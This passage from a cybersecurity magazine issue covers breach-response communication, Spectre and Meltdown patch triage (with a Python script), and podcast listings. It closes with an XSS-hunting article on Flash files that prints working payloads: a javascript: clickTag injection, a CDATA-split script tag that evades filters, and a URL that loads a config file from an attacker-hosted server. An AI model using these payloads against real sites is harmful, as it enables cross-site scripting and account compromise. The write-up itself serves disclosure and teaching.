sites like Twitter, Facebook and YouTube. Social media has created citizen journalists and the age of instant news and direct reporting from those who have been affected in some way. It has forever changed how the public gets its news. This in turn has changed the way that responses to a data breach must be handled: a response must be immediate, and it must include a commitment to two-way dialogue and to being open, honest and transparent about what has happened and what is being done to fix the problem. Social media adds complexity to communicating in a crisis; the multiple user channels, user control over messages and the real-time delivery of those messages make social media far more complex to manage than the simple press releases of days gone by. The use of social media in your communications plan is no longer optional in the era of instant and always-available news. When communicating post breach, your goal should be to satisfy your audience and provide sufficient information.
Identify those who have been affected and ensure that your messages are correct and consistent, so that any corrections are limited. This will make it easier for you to maintain your credibility. The biggest mistakes are not being proactive and not having a full grasp of the facts of the breach before issuing communications. To develop and maintain credibility you must show that your organisation is on top of the situation and has implemented an action plan to control and mitigate against further harm. When structuring your communications, be sure to:
• Admit your mistakes.
• Communicate early and often.
• Be sure to tell your side of the story before someone else does.
• Explain what will be different in the future.
Communicating after a data breach is difficult, as not all of the facts may be known, but it is always necessary to show concern for the safety of those who have been impacted. When choosing your communication channels, consider the following:
• Written statement or press release;
• Your website;
• Email to those affected;
• Call centre scripts;
• In-store signage;
• A written letter;
• Social media posts;
• Advertising on the radio, on TV or in newspapers; and
• A video message.
In Australia, it is now mandatory for organisations that must comply with the Privacy Act to report breaches of personal information to both the Office of the Australian Information Commissioner (OAIC) and those affected. Notification is required where there is a real risk of serious harm. Once a decision has been made to notify those affected, consider when and how notification should occur, who will make it and who exactly will be notified. Notification may be made via phone, letter, email or in person. The notification should include:
• A description of the incident.
• The type of personal information that has been lost.
• The organisation’s response.
• What type of assistance is available.
• Contact details.
• How the individual may lodge a complaint with the OAIC.
For a detailed discussion of Australia’s mandatory data breach laws, refer to my article in the third edition of Australian Cyber Security Magazine, “Mandatory Data Breach Reporting: What You Need to Start Doing Right Now”. In other countries that do have mandatory data breach notification laws, the demand for identity monitoring and cyber insurance services grows once notification becomes mandatory, creating new industries. Post-breach notification requirements drive the implementation of incident response processes that may become a source of competitive advantage between organisations.
Nothing beats real world examples, so let’s take a look at five breaches that have made the headlines, Uber, Equifax, Target, Anthem and Sony.
Uber
Uber experienced a data breach in October 2016, but only revealed the existence of the breach in November 2017. Hackers had accessed the personal information of 57M Uber users and drivers. Uber had failed to notify its customers, drivers and regulators of the breach. The information accessed included name, email address, phone number and, for some users, their driver’s license details. Following the announcement of the breach, Uber provided those whose driver’s license information had been accessed with free credit monitoring and identity theft protection. It was also revealed that Uber had paid $100K to the hackers responsible to delete the data and keep quiet regarding the breach. Uber’s Chief Security Officer and a deputy left in the wake of the scandal. At the time of the hack, Uber had just settled a lawsuit with the New York attorney general over data security disclosures and was in the process of negotiating with the Federal Trade Commission over the handling of consumer data. Uber is a company not short of controversy; at the time the breach was announced, U.S. officials were looking into possible bribes, illicit software, questionable pricing schemes and theft of a competitor’s intellectual property. Uber attempted to cover up the breach; this is never a good approach. They took over a year to disclose what had happened, and when the details were disclosed it was found that they had paid the hackers $100K to keep quiet. Uber is now subject to numerous government-backed lawsuits and investigations across many different jurisdictions, resulting from the failure to disclose the breach to regulators. Add to that the very likely class action lawsuits and Uber’s legal position becomes even more tenuous. When reached for comment, an Uber spokesperson said: "We take this matter very seriously and we are happy to answer any questions regulators may have. We are committed to changing the way we do business, putting integrity at the core of every decision we make, and working hard to re-gain the trust of consumers." In short, if you suffer a breach, disclose it in accordance with any applicable laws and within the required timeframe. Uber by all accounts failed generally at good corporate governance across many facets of its business operations. Incidentally, the hackers gained access to Uber’s AWS environment by using credentials they found in a private Git repository: Uber’s developers had published code that included their usernames and passwords.
Equifax
In September 2017 the credit reporting agency said the information of more than 145 million Americans had been compromised. Whilst the data breach was not the largest, it could become the most economically damaging due to the sensitivity of the compromised information. The company’s handling of the breach is quite possibly the worst response to date of any organisation. The breach itself occurred sometime between mid-May and July. The hack was discovered on the 29th of July and the company waited 6 weeks to disclose the breach. If that was not bad enough:
• In the wake of the breach Equifax offered free credit monitoring to customers – but the offer required anyone who enrolled to waive their right to sue the company. The company later backpedalled.
• CEO Richard Smith’s apology is lacklustre at best and does not highlight the gravity of the information that was lost and the implications for those impacted. Proper crisis management calls for a sincere apology that assumes responsibility, promises to investigate the mishap and, most importantly, makes amends. Apologies written to reduce legal liability will not be taken well.
• The day after announcement of the breach, the Equifax Twitter customer service account tweeted “Happy Friday! You’ve got Stevie ready and willing to help with your customer service needs today!” Twitter users did not appreciate the tweet’s tone. It was not a good way to show empathy to the many people worried they may become victims of identity theft. All social media channels should be aligned once an organisation is in crisis mode.
• Those who called the number provided by Equifax and managed to reach someone or receive a return call were told that the call centre had no information to share.
Target
A data breach is bad, but letting someone else tell the world it has happened is even worse. Brian Krebs from www.krebsonsecurity.com broke the story about the Target breach 6 days before Target acknowledged the situation. Over 40 million credit/debit card numbers were leaked, as well as the personal details of over 70 million customers. The sooner the incident is acknowledged, the sooner you can start saving face. From the Target breach we learned that organisations must be prepared for the influx of customer complaints and enquiries. Target’s call centre was overwhelmed and its social media channels folded under the complaints. Despite an initially shaky start, Target was able to pick up its response by:
• Holding daily news briefings.
• Having the CEO issue an apology via video.
• Giving shoppers a discount.
• Creating a website for disseminating information related to the breach.
• Providing free credit monitoring for a year to impacted customers.
Anthem
Anthem, at the time of the data breach, was the USA’s second largest health insurer. Over 80 million customer records were exposed, containing personal information like name, address, date of birth, social security number, email address, phone number and salary. Upon discovering the breach, Anthem secured the vulnerability, contacted the FBI and engaged an outside security consulting firm. Anthem’s initial efforts were praised by the FBI. Anthem’s response featured:
• The launch of a dark site – www.anthemfacts.com
• A statement by the CEO.
• Release of frequently asked questions (FAQ).
• A phone hotline.
• An open letter from the CEO.
• Social media releases on Facebook and Twitter.
• The provision of credit monitoring and identity protection services to impacted customers.
Anthem was quick to respond to customer queries. Most news stories regarding the breach contained direct quotes from Anthem spokespeople, elements of their initial statements and links to the dark site.
Sony
Sony’s response to the 2014 incident should stand as a lesson in what NOT to do. The Sony Pictures CEO is on the record as stating that Sony had no playbook on how to respond. Sensitive documents, embarrassing emails, unreleased movies and the personal information of over 40,000 people, both current and former employees, were leaked. Sony waited days to respond to the media and missed opportunities to update the public on what was happening. In short, be prepared, have a plan, test it and make sure that everyone on your team knows what to do when the inevitable data breach occurs.
About the Author
Wayne Tufek is currently the Director of CyberRisk (www.cyber-risk.com.au). For over 20 years he has formulated pragmatic, business-driven strategies to establish, execute and improve cyber risk management in ASX listed companies and some of Australia's largest organisations across the public sector, Big 4, financial services, consumer products, education and retail sectors. Wayne is a member of Chartered Accountants Australia and New Zealand and holds the SABSA SCF, CISSP, CRISC and CISA qualifications. He frequently presents at security conferences and events in Australia and internationally.
Cover Feature Cyber Security
Spectre and Meltdown: Worrying about the tyres while the car’s on fire
By Elliot Dellys
Growing up, my father constantly gave me advice in the form of single-sentence philosophical soundbites. I couldn’t stand it at the time, but over the course of my career I have parroted them far more often than I care to admit. The one I’ve found myself repeating more than any other is: “you’re worrying about the tyres while the car is on fire”. It is easy to get excited about new or dramatic information, especially when it potentially affects our business – yet too often organisations focus on the hot topics, while the broader enterprise is jeopardised by risks that remain overlooked or are simply put into the “too hard basket”. This article will provide a high-level technical breakdown of what has likely been the most widely-reported group of vulnerabilities to date, collectively referred to as Spectre and Meltdown. It will cover how speculative execution works, how it is vulnerable to attack, why the reach of Spectre and Meltdown is so broad and their impact potentially so catastrophic, and the current mitigations available. But I will also offer a case for why they are – at least for the time being – unlikely to be your business’ top cyber risk. For most readers Spectre and Meltdown are unlikely to even
22 | Australian Cyber Security Magazine
be your organisation’s most severe technical vulnerability – but they are almost certainly the most well-known. In closing, I will outline how a solid implementation of the security basics is typically the best protection against emerging threats. To understand the risk posed by Spectre and Meltdown, it is worth briefly outlining the principle of speculative execution. For decades CPUs have been designed to perform their number-crunching duties ‘out-of-order’ to attain processing speeds beyond what is achievable from a simple sequential instruction cycle. Modern processors typically achieve this via speculative execution, in which multiple execution branches are prepared simultaneously and the hardware assumes – or ‘speculates’ – about which branch is likely to be taken. When this speculation is accurate, the processing time is decreased as the instructions have already been calculated; when it is not, the unnecessary calculations are simply discarded. The fundamental flaw in this process is that speculative execution allows for privileged information to be observed by a process of lower privilege. The three Common Vulnerabilities and Exposures
Cyber Security
Exploiting each requires a slightly different attack methodology: whereas Meltdown disregards privilege boundaries to allow an unprivileged process to access the kernel address space, Spectre leverages branch prediction to execute erroneous instructions and leak information from the victim’s memory address space.
(CVEs) disclosed to date include: CVE-2017-5753 (Bounds Check Bypass) and CVE-2017-5715 (Branch Target Injection), collectively known as Spectre; and CVE-20175754 (Rogue Data Cache Load), which has been dubbed Meltdown. Exploiting each requires a slightly different attack methodology: whereas Meltdown disregards privilege boundaries to allow an unprivileged process to access the kernel address space, Spectre leverages branch prediction to execute erroneous instructions and leak information from the victim’s memory address space. The breadth of these vulnerabilities is exceptionally broad: Meltdown affects almost all of Intel's x86 processors (and some ARM designs) and Spectre, which exploits a wider range of speculative execution features, potentially affects all Intel, AMD, and ARM microprocessors. This means almost every processor produced in the last twenty years is vulnerable, regardless of operating system or device type (including network equipment, end-user systems, as well as mobile and IoT devices). In fact, the Spectre attacks are so adaptable that by leaking information from the browser address space to JavaScript, sensitive information such as credentials or credit card details from any capable
device can potentially be exposed. One of the saving graces of the Spectre and Meltdown threat is that, as of the time of writing, no publicly known malware exploits these vulnerabilities. With so many potential targets and such valuable data ripe for the taking, it is natural to wonder why. Luckily, these attacks are very difficult to execute in the wild for several reasons. Firstly, vendors were notified under non-disclosure agreement several months before the public announcement to allow ample time for mitigations to be developed and infrastructure to be updated. This has made opportunistic malware development significantly less fruitful. Secondly, for these attacks to be viable, the attacker must already be able to run code on the target machine; in the case of Spectre, this can include malicious JavaScript executed by the user's browser. This poses an additional and non-trivial hurdle for any attacker hoping to mount a Meltdown or Spectre attack. Thirdly, the applicability of the vulnerabilities is relatively limited. Exploiting Spectre or Meltdown does not inherently enable code execution, network lateral movement, spoofing, repudiation, etc. Finally, developing software capable of exploiting these vulnerabilities requires an exceptional level of skill and a deep knowledge of the target environment. The reconnaissance necessary to execute a Spectre or Meltdown attack is orders of magnitude greater than the SMB handshake required to detect vulnerability to Wannacry, for example. Nonetheless, there is inevitably a delay between vulnerability disclosure and industry remediation that provides attackers a window of opportunity. So, what can be done right now to prevent future attacks? Operating system patches are either already available or under development to address the two vulnerabilities. For Meltdown, this entails isolating the kernel and user mode page tables to prevent leakage of sensitive data. 
For Spectre, the solution is not so straightforward. The two variants each affect a far broader range of hardware, and the fixes have to be applied wherever sensitive code runs: compiler changes (such as inserting speculation barriers, or retpolines that replace the vulnerable indirect branches) or eliminating branch speculation in code paths that handle sensitive data. To minimise the risk of attacks using JavaScript, WebKit have begun implementing branchless security checks as well as reducing timer precision (browsers also disabled SharedArrayBuffer, which could otherwise be used to rebuild a high-resolution timer), and Intel has announced it will add capabilities to alter the behaviour of branch prediction in its processors as well as releasing microcode updates where possible. AMD have responded by advocating a collaborative effort amongst industry and safe computing practices (including patching) for customers to minimise the threat. Unfortunately, but predictably given that speculative execution exists to optimise processor performance, the current solutions come at a performance cost. With the kernel and user mode page tables separated, the translation lookaside buffer (the cache that maps virtual addresses to physical memory addresses) has to be flushed on every transition between user and kernel mode, at least on processors that cannot tag TLB entries by context. This has been widely reported to cause up to a 30% loss of performance; however, early benchmarking indicates this figure is the exception, not the rule, and representative only of workloads that demand constant context switching (i.e. frequent access to both user and kernel memory space, such as heavy system-call or I/O loads). There are industries and networks with a very low tolerance for performance loss, for whom careful prioritisation of patch deployment and a strong asset management strategy are essential. For most organisations, and individuals, the performance drop is likely to be negligible. The authors of the Spectre and Meltdown papers acknowledged the inevitable performance impacts from the outset, attributing the emergence of these vulnerabilities to a "longstanding focus in the technology industry on maximizing performance".
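Whether a given host actually carries these mitigations is something to check rather than assume, and the check is what drives the prioritisation described above. The script below is an added example written for this article, not the author's tooling. It relies on the interface Linux kernels from 4.15 provide under /sys/devices/system/cpu/vulnerabilities/ (one file per issue, holding a line such as "Not affected", "Vulnerable" or "Mitigation: PTI"); the host names, status lines and sensitivity ratings in the sample register are constructed for the example.

```python
"""
Fleet triage of Spectre/Meltdown mitigation status.

Added example for this article, not the author's. Linux 4.15+ exposes one
file per issue under /sys/devices/system/cpu/vulnerabilities/ (meltdown,
spectre_v1, spectre_v2). The status lines, hosts and ratings below are
constructed for the example.
"""
from pathlib import Path
from typing import Dict, List

SYSFS_DIR = Path("/sys/devices/system/cpu/vulnerabilities")
ISSUES = ("meltdown", "spectre_v1", "spectre_v2")


def parse_status(line: str) -> str:
    """Collapse a sysfs status line to not_affected / mitigated / vulnerable / unknown."""
    text = line.strip()
    if text.startswith("Not affected"):
        return "not_affected"
    if text.startswith("Mitigation:"):
        return "mitigated"
    if text.startswith("Vulnerable"):
        return "vulnerable"
    return "unknown"


def read_local_status(sysfs_dir: Path = SYSFS_DIR) -> Dict[str, str]:
    """Live status of this host; a missing file (pre-4.15 kernel, other OS) reads as 'unknown'."""
    return {issue: (parse_status((sysfs_dir / issue).read_text())
                    if (sysfs_dir / issue).exists() else "unknown")
            for issue in ISSUES}


# Constructed asset-register entries: raw sysfs lines collected from each host,
# a data-sensitivity rating (1 low .. 3 high) and whether the workload cannot
# tolerate the context-switch overhead of the patches.
SAMPLE_HOSTS = [
    {"name": "db-prod-01", "sensitivity": 3, "perf_critical": True,
     "sysfs": {"meltdown": "Vulnerable",
               "spectre_v1": "Mitigation: __user pointer sanitization",
               "spectre_v2": "Vulnerable: Minimal generic ASM retpoline"}},
    {"name": "kiosk-07", "sensitivity": 1, "perf_critical": False,
     "sysfs": {"meltdown": "Vulnerable", "spectre_v1": "Vulnerable",
               "spectre_v2": "Vulnerable"}},
    {"name": "build-03", "sensitivity": 2, "perf_critical": False,
     "sysfs": {"meltdown": "Mitigation: PTI",
               "spectre_v1": "Mitigation: __user pointer sanitization",
               "spectre_v2": "Vulnerable"}},
    {"name": "hr-laptop-12", "sensitivity": 3, "perf_critical": False,
     "sysfs": {"meltdown": "Mitigation: PTI",
               "spectre_v1": "Mitigation: __user pointer sanitization",
               "spectre_v2": "Mitigation: Full generic retpoline"}},
]


def remediation_plan(hosts: List[dict]) -> List[dict]:
    """Rank hosts for patching: exposure weighted by sensitivity, with an action per host."""
    plan = []
    for host in hosts:
        status = {issue: parse_status(line) for issue, line in host["sysfs"].items()}
        # 'unknown' (no sysfs file) is treated as exposed: a kernel that cannot
        # report its status predates the fixes and should be assumed unpatched.
        exposed = sorted(i for i, s in status.items() if s in ("vulnerable", "unknown"))
        score = len(exposed) * host["sensitivity"]
        if not exposed:
            action = "no action"
        elif host["perf_critical"]:
            action = "benchmark patch in staging, then schedule a window"
        else:
            action = "patch now"
        plan.append({"host": host["name"], "exposed": exposed,
                     "score": score, "action": action})
    # Highest score first; among equals, hosts that can be patched immediately come first.
    return sorted(plan, key=lambda p: (-p["score"], p["action"] != "patch now", p["host"]))


if __name__ == "__main__":
    for entry in remediation_plan(SAMPLE_HOSTS):
        print(f"{entry['host']:<14} score={entry['score']}  "
              f"exposed={entry['exposed']}  {entry['action']}")
    print("this host:", read_local_status())
```

On a Windows fleet the equivalent per-host data comes from Microsoft's SpeculationControl PowerShell module (Get-SpeculationControlSettings); the ranking logic is the same. The score is deliberately simple: the point is that a vulnerable kiosk and a vulnerable database server are not the same finding, which is what the asset register is for.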
Mitigations that better preserve the efficacy of speculative execution and data caching are also likely to emerge in the coming months, so concerns about performance loss from patching are, for most industries, likely to diminish correspondingly. Of course, this timeless balancing act between performance or user experience and security is nothing new. I have explained to numerous clients why having a "zero risk tolerance" functionally entails shutting an entire system down. The goal is therefore to ensure the allocation of effort is proportionate to risk, both in identifying exposure to emerging vulnerabilities in general and in ensuring security requirements are considered alongside performance expectations. To achieve this, a clear security strategy is invaluable: getting the basics right always provides a strong starting position to counter any emerging threat. In the case of Spectre and Meltdown, an unpatched browser or existing access to the target device is a prerequisite for exploitation, and therefore the standard suite of security controls (such as ASD's Essential Eight) provides a solid baseline of protection against an attacker gaining the necessary initial foothold. Maintaining an accurate asset register and understanding the value of those assets is also imperative. For some devices, performance may be critical and the information handled without sensitivity; for others, performance will be less important but the information processed requires the utmost protection. This insight is essential when making informed decisions about which devices require immediate attention and which can be afforded a lower priority for remediation. Understanding what other vulnerabilities those assets may be exposed to also provides a more complete picture of the threat environment and can inform risk tolerance and management strategies.
It is also crucial to avoid underestimating the human element. A well-trained and informed workforce is one of the best measures to ensure vulnerable assets are not discovered by a threat actor in the first place. The same holds true for key decision-makers. Test your key assumptions and ask: "how would I gain unauthorised access to my organisation's sensitive data?" For most readers, this exercise will almost certainly produce a long list of vectors that pose a greater threat than Spectre and Meltdown. This perspective goes a long way towards ensuring your attention is focussed on the flaming engine, and not the shiny new Bridgestones. As a final note, it is my belief that the media and industry reaction to the disclosure of Spectre and Meltdown has exposed a fascinating selection bias in the way we contextualise risk, but that will be the subject of another article.
About the Author
Elliot Dellys is a Senior Security Advisor for Hivint, with extensive experience delivering complex technical projects, teaching international audiences, and providing risk management and compliance advice across Government and Industry. Elliot is a firm believer that strong relationships and a collaborative culture are the keys to achieving meaningful security maturity, and enjoys writing on the more abstract applications of cyber security in the fields of politics and ethics.
TUNE IN NOW!
www.australiancybersecuritymagazine.com.au
PODCAST HIGHLIGHT EPISODES
Episode 28 – Australia's eSafety Commissioner, Julie Inman-Grant, discussing online safety, cyber bullying and child exploitation
Julie Inman-Grant, the Australian eSafety Commissioner at the Office of the eSafety Commissioner, speaks with Chris Cubbage at the Women in Cyber Mentoring Event in Sydney. Julie discusses her role and her focus on online safety, preventing cyber bullying and child exploitation, and how her 17 years formerly at Microsoft, as well as Adobe and Twitter, assist her in her role as the Commissioner of eSafety. Chris and Julie also discuss the three pillars within eSafety of safety, security and privacy, their inter-connectedness and priorities, and how parenting and education are still the two major lines of cyber-defence.
Episode 15 – Protecting media & journalists in hostile environments – Shannon Sedgwick, CEO of GM Risk Group
In this interview, Chris Cubbage interviews Shannon Sedgwick, CEO of GM Risk Group, a consulting firm specialising in protecting media staff, in terms of both physical and cyber security, as they travel in hostile environments. Shannon has personally provided protective services to media companies and has travelled to over 30 countries this year, including the Congo, Afghanistan and Iraq. Shannon discusses the services that GM Risk Group provide, how to mitigate risk, and the increased focus of media companies on duty of care and overall safety for journalists. If you, or members of your team, work in regions of the world where data or physical safety are at risk, then you'll enjoy this interview with Chris Cubbage and Shannon Sedgwick.
Episode 25 – ECU Cooperative Research Centre & Dr Peter Hannay's research into historical location data within digital devices
In this interview, Dr Peter Hannay of Edith Cowan University (ECU) provides insight into the recent completion of his doctoral research, which focused on historical location data that can be gathered from small and embedded devices. This research was used by WA Police to assist in homicide cases, for tracking a suspect's movements as well as providing a credible alibi. Peter also talks about ECU's Cooperative Research Centre, a $130 million project, as well as leading research in cyber security, particularly IoT. If you're interested in cyber security research, and true crime, then you'll enjoy this interview with Chris Cubbage and Dr Peter Hannay.
Episode 8 – Meet Renowned Autonomous Vehicle Security Architects & "White Hat" Hackers, Dr. Charlie Miller and Chris Valasek, GM's Cruise Automation
You'll love this interview with Charlie Miller and Chris Valasek. As the sixth interview at #AISACON17 in Sydney, we met these celebrity 'security architects', who first hacked two non-connected, commercially available cars using a diagnostic port. While some consideration was made to security in the original software, Chris and Charlie highlighted that with a little problem solving, and a lot of patience, control systems affecting steering, brakes and lights could be manipulated. Later, the dynamic duo set their sights on 'remotely' hacking a Jeep SUV. In this interview, we'll learn how they were able to bridge the gap between the 'head unit', or radio, and the control systems, and take control, all while the driver was travelling at over 100 km per hour. Enjoy the discussion!
Episode 17 – Tackling online extremism through inclusion and tolerance: The Raqib Taskforce
In this interview, Chris Cubbage interviews Anooshe Mushtaq, Chair and Founder of The Raqīb Taskforce, an organisation that promotes social inclusion and cohesiveness for Australia's Muslim community, particularly the youth. Anooshe shares how her grassroots organisation is helping to debunk hate speech, remove division, and promote the voice of young Muslims, to counter extremism both within and outside the Muslim community. This involves a host of online and social media strategies. Ultimately, the Raqib Taskforce aims to build a tolerant and cohesive society through better understanding of all sides. Please note: this interview was arranged and conducted by MySecurity Media independently of the Risk Management Institute's National Conference. Recorded November 16, 2017, Canberra.
Episode 9 – Cyber Threat Alliance (CTA) President Michael Daniel in Sydney #AISACON17
Our seventh interview at #AISACON17 in Sydney in October is with the President of the Cyber Threat Alliance, Mr Michael Daniel. In this interview, Michael Daniel talks about his new role at the Cyber Threat Alliance, or CTA, and how his organisation and the 12 member companies are sharing threat intelligence at speed and scale. In particular, you'll hear about the CTA's 'sharing rule', which ensures collaboration and improves all members' products and services. And this sharing is quick: Michael highlights that the time from detection by one member company to deployment by another member company can be as short as 54 minutes. In this interview you'll hear cyber security vendors working together to collectively and systemically disrupt the 'bad guys'.
Episode 49 – ASEAN-Australia AUSTRAC Codeathon 2018 – Interview with AUSTRAC's Chief Innovation Officer & Director for Innovation, Information & Transformation
Chris Cubbage talks to Leanne Fry, Chief Innovation Officer, and Rajesh Walton, Director for Innovation, Information & Transformation, both of AUSTRAC, at the ASEAN-Australia Codeathon held in Sydney.
Episode 37 – Red Hat, the world's largest open source software company, in APAC & video surveillance
You'll hear about the role of Red Hat as a technology steward, bridging open source software with enterprises while maintaining peace of mind, the Red Hat product suite, and their role in reducing costs within the surveillance market through more efficient data compression algorithms and storage.
Episode 47 – The entertaining Adam Spencer, MC of the ASEAN-Australia Codeathon, hosted by AUSTRAC
The always entertaining and intelligent Adam Spencer, MC at the ASEAN-Australia Codeathon in Sydney, hosted by AUSTRAC. Adam discusses the importance of regional collaboration with respect to cyber security, and also how blockchain technologies could help to increase integrity in our daily lives.
Episode 36 – Artificial Intelligence, Deep Learning & Neural Networks
Hans Skovgaard, the Vice President of Research & Development with Milestone Systems, discusses Artificial Intelligence, its changing popularity over the past 30 years, and its resurgence in relation to deep learning, due to the power of today's computational neural networks.
Episode 48 – Implications & Opportunities of the European Union's GDPR and Australia's NDB scheme
David Kemp, Specialist Business Consultant, and Matthew Hanmer, Regional Director Security Software, both from Micro Focus, the 7th largest pure software company in the world, discuss the implications of the European Union's GDPR, or General Data Protection Regulation, and Australia's Mandatory Notifiable Data Breach (NDB) scheme.
Episode 31 – Women in Cyber – Sandra Ragg, Deputy National Cyber Security Adviser within the Department of Home Affairs and Cabinet & Heide Young, National Events Manager, Australian Women in Security Network
Sandra Ragg, Deputy National Cyber Security Adviser within the newly formed Department of Home Affairs, and Heide Young, the National Events Manager for the Australian Women in Security Network, or AWSN, discuss the role of the AWSN, its rapid growth in membership, future plans of cooperation and initiatives, its role in mentoring women in cyber security, as well as the cultural change required to increase the percentage of women in cyber security, but also the importance of inclusion of women, not just diversity for diversity's sake.
Episode 45 – Insight into MarkLogic's Secure NoSQL Database
Tim Macdermid, VP of Sales for APJ, and Jason Hunter, the CTO of Asia-Pacific, both of MarkLogic, talk about the company's growth and expansion, starting from servicing publishing, public sector, intelligence agencies and financial services, big and small, as well as its application within cyber security.
Episode 30 – CISO Insights – Narelle Devine, Chief Information Security Officer – Australian Department of Human Services
Narelle Devine, Chief Information Security Officer for the Department of Human Services, discusses the difficulty in going out to market to find talent in cyber security, and how it takes 'all sorts' with a broad experience to build a strong cyber security team. The interview also discusses her role as a CISO and the importance of developing a peer-to-peer network to generate solutions and collaborate on ideas.
Episode 22 – Analyst Insights – Enterprise cyber security market & China's citizen score card with cyber regulations
Claudio Stahnke, Research Analyst focused on IT security with Canalys, recorded at the Canalys Channels Forum, 5-7 December 2017 in Perth, discusses the enterprise cyber security market in general, the EU's General Data Protection Regulation, or GDPR, as well as mandatory reporting on security breaches, cyber insurance, vendor mergers, IoT predictions, and China's citizen score card (Social Credit System) and their cyber regulations.
Cyber Security
XSSposing bugs via Shockwave Flash analysis
By Jason Magic
Flash player related vulnerabilities have been notorious in their susceptibility to a vast range of attacks over time. When performing an offensive engagement, whether through consultancy or through external responsible disclosure programs, it is highly recommended that analysis of any Shockwave Flash (SWF) file be performed. While many haven't explored this attack path, it is a widely known issue. During my brief period as a bounty hunter, I identified SWF related vulnerabilities within a multiplex of organizations, as well as high profile government entities, including police agencies, NASA, NATO, the Australian Signals Directorate, US Army, US Air Force, US Navy and more.
As opposed to deep diving into flash exploitation and the various attack vectors, this article will focus on a more generic overview, prior to presenting my own findings, as a reminder as to how SWF files can pose a threat, their capabilities, and the potential attack path associated with insecure variations being hosted and exposed to the public domain. SWF files are created through ActionScript, whose syntax is very similar to JavaScript, as both are based on ECMAScript. Like any other language, failure to properly validate and sanitize user input can leave the segment vulnerable to various attacks. Furthermore, ActionScript itself contains methods that are rendered 'unsafe' when their arguments are attacker-controlled, including, but not limited to:
externalInterface.call(), getURL(), loadVariables(), navigateToURL(), loadMovieVar(), loadMovieNum(), LoadVars.load, LoadVars.send, XML.load('url'), XML.sendAndLoad('url'), LoadVars.load('url'), LoadVars.send('url'), flash.external.ExternalInterface.call(_root.callback), externalInterface.addCallback, AddDLL, etc.
Insecure global variables:
_root, _global, _level0
In terms of performing the analysis, SWF files can be decompiled through various tools, a common one being Flare. Once decompiled, the analysis proceeds in a white-box manner as a source code review. There are tools that can perform static code analysis in an automated manner; however, they often miss many insecurities, so a more manual approach is recommended. Since ActionScript is a straightforward language, only basic knowledge of its structure, methods and syntax is required. The main objective of the code analysis is to get an overview of the code flow, how variables are handled and, if possible, how to manipulate such variables. For example, look for lack of input sanitization, undefined flashvars, and use of the insecure global variables and method calls. If a flashvar is read through one of the above global variables but is never assigned a value by the SWF itself, then it can be supplied from the embedding page or the URL, and the SWF is likely to be vulnerable. For example, see the vulnerable decompiled source below (the else branch of the conditional was lost in reproduction and is restored here as the empty string):

    button 48 {
        on (release) {
            // clickTag is read from _level0 but never assigned by the SWF,
            // so whoever embeds the movie, or crafts the URL, controls it
            var str = (_level0.clickTag != undefined) ? _level0.clickTag : '';
            getURL(str, '');
        }
    }

The above illustrates a vulnerability in the clickTag flashvar. During the analysis it was found that this 'clickTag' variable is associated with the release of button 48; note the use of the global variable _level0. This button was mapped to the entire flash movie, meaning the value stored in this flashvar is used only when the victim clicks anywhere on the movie itself. Therefore, in this case, successful exploitation requires a form of social interaction, as the user must click on the flash movie to trigger the exploit. In the above scenario, the clickTag flashvar was originally declared to redirect the user to an informative page within the HTTP content.
However, due to the lack of variable definition, the lack of input sanitization, the use of the unsafe getURL() method, and the incorporation of the insecure _level0 global variable, an attacker is able to control the behaviour of the vulnerable variable. This is achieved by assigning malicious values to the variable and having it passed via GET. The above example can be exploited via:
?clickTag=javascript:confirm(document.domain);
or
?clickTag=//ret2eax.pw
The vulnerabilities that can exist within Shockwave Flash files include SOME (Same-Origin Method Execution) attacks, content forgery, unvalidated redirects, and XSS, the last of which allows an attacker to execute malicious client-side scripts.
In terms of exploiting such vulnerabilities through a cross-domain approach, some vendors incorporate an XML config file to control the behaviour of the SWF. These SWF files may therefore have a dynamic flashvar pointing to a config file on the same server the SWF is hosted on. However, if this flashvar can be controlled by the attacker externally, then with a permissive cross-domain policy (crossdomain.xml) configured on the attacker's server, all that is required is to point the SWF at a malicious XML file hosted on the attacker's server, which in turn includes the instructions that control the SWF and thus determine its behaviour. The attack vectors associated with this method of exploitation remain similar to the above; only the methods vary slightly. For example, an XSS payload is incorporated within an XML entity, either as a variable's value or in an arbitrary position, through the malicious XML via the use of CDATA sections. Because the string "<script" never appears contiguously in the file, naive filtering on the raw XML misses it, yet the parser reassembles the complete element:
<![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>
This would then be called in the manner of:
http://example.com/swf/example.swf?xml_path=//attacker.com/poc.xml
I identified this issue within many SWF generators and slideshow makers, including a Windows application titled Flash Slideshow Maker Professional, with version 5.20 and below being vulnerable in the way they handle 'advanced' file behaviour. See CVE-2017-12439 for more information. Due to length constraints, if you want more information regarding SWF analysis, visit my blog http://ret2eax.pw; additionally, the following resource is very informative: https://soroush.secproject.com/downloadable/flash_it_baby_v2.0.pptx
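The review described above (collect flashvars read from the insecure globals, discard those the SWF assigns itself, and see which of the rest reach an unsafe method) is mechanical enough to script as a first pass over decompiled output. The script below is an added example written for this article, not the author's tooling. It goes slightly further than the text by tracking a flashvar through one local assignment (the `str` pattern above) and through an XML or LoadVars object to its `load()` call, and it shows why the CDATA-split payload survives a naive filter. The "decompiled" source it analyses is constructed for the example, not taken from a real SWF, and attacker.example is a placeholder host.

```python
"""
Static triage of decompiled ActionScript 2 for flashvar-to-unsafe-sink flows.

Added example for this article, not the author's tooling. The decompiled
source below is constructed for the example; attacker.example is a
placeholder host.
"""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Set

# Sinks from the article's list (subset), mapped to what an attacker gains
# when the argument is under their control.
SINKS = {
    "getURL": "unvalidated redirect / javascript: URI (XSS)",
    "navigateToURL": "unvalidated redirect / javascript: URI (XSS)",
    "loadMovieNum": "attacker SWF loaded into the movie",
    "loadMovie": "attacker SWF loaded into the movie",
    "loadVariables": "attacker-controlled variables",
    "ExternalInterface.call": "arbitrary JavaScript in the embedding page",
    "XML.load": "attacker-hosted XML config (cross-domain)",
    "LoadVars.load": "attacker-hosted variables (cross-domain)",
}

FLASHVAR_READ = re.compile(r"\b(?:_level0|_root|_global)\.(\w+)\b")
FLASHVAR_WRITE = re.compile(r"\b(?:_level0|_root|_global)\.(\w+)\s*=(?!=)")
LOCAL_ASSIGN = re.compile(r"\bvar\s+(\w+)\s*=\s*([^;]+);")
LOADER_CTOR = re.compile(r"\bvar\s+(\w+)\s*=\s*new\s+(XML|LoadVars)\s*\(")
DIRECT_SINK = re.compile(
    r"\b(getURL|navigateToURL|loadMovieNum|loadMovie|loadVariables|ExternalInterface\.call)"
    r"\s*\(([^;]*)\)")
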